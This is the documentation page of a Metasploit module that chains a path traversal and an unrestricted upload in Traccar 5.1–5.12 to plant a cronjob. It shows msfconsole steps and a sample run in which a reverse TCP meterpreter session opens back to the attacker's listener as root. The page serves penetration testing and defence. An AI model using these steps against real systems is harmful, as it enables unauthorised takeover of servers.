ContextQMD
Back to Metasploit Framework

Traccar Rce Upload

documentation/modules/exploit/linux/http/traccar_rce_upload.md

6.4.1312.6 KB
Original Source

Vulnerable Application

This module exploits two vulnerabilities in Traccar v5.1 - v5.12 to obtain remote code execution: A path traversal vulnerability (CVE-2024-24809) and an unrestricted file upload vulnerability (CVE-2024-31214). By default, the application allows self-registration, enabling any user to register an account and exploit the issues. Moreover, the application runs by default with root privileges, potentially resulting in a complete system compromise. This module, which should work on any Red Hat-based Linux system, exploits these issues by adding a new cronjob file that executes the specified payload.

Testing

The software can be obtained from the vendor.

Installation instructions are available here.

The vulnerable application runs by default on Eclipse Jetty, which listens on TCP port 8082.

Successfully tested on

  • Traccar v5.12 on Rocky Linux 9.4
  • Traccar v5.11 on Rocky Linux 9.4

Verification Steps

  1. Install and run the application
  2. Start msfconsole and run the following commands:
msf > use exploit/linux/http/traccar_rce_upload  
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(linux/http/traccar_rce_upload) > set RHOSTS <IP>
msf exploit(linux/http/traccar_rce_upload) > set LHOST <IP>
msf exploit(linux/http/traccar_rce_upload) > exploit

You should get a meterpreter session in the context of root.

Options

USERNAME

Username to be used when creating a new user.

PASSWORD

Password for the new user.

EMAIL

E-mail for the new user.

Scenarios

Running the exploit against Traccar v5.12 on Rocky Linux 9.4, using curl as a fetch command, should result in an output similar to the following:

msf exploit(linux/http/traccar_rce_upload) > exploit 

[*] Started reverse TCP handler on 192.168.217.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Registering new user...
[*] Authenticating...
[*] Adding new device...
[*] Uploading crontab file...
[*] Cronjob successfully written - waiting for execution...
[*] Sending stage (3045380 bytes) to 192.168.217.138
[*] Meterpreter session 1 opened (192.168.217.128:4444 -> 192.168.217.138:58196) at 2024-08-25 17:03:02 -0400
[*] Exploit finished, check thy shell.

meterpreter > sysinfo 
Computer     : localhost.localdomain
OS           : Red Hat 9.4 (Linux 5.14.0-427.13.1.el9_4.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux

meterpreter > getuid 
Server username: root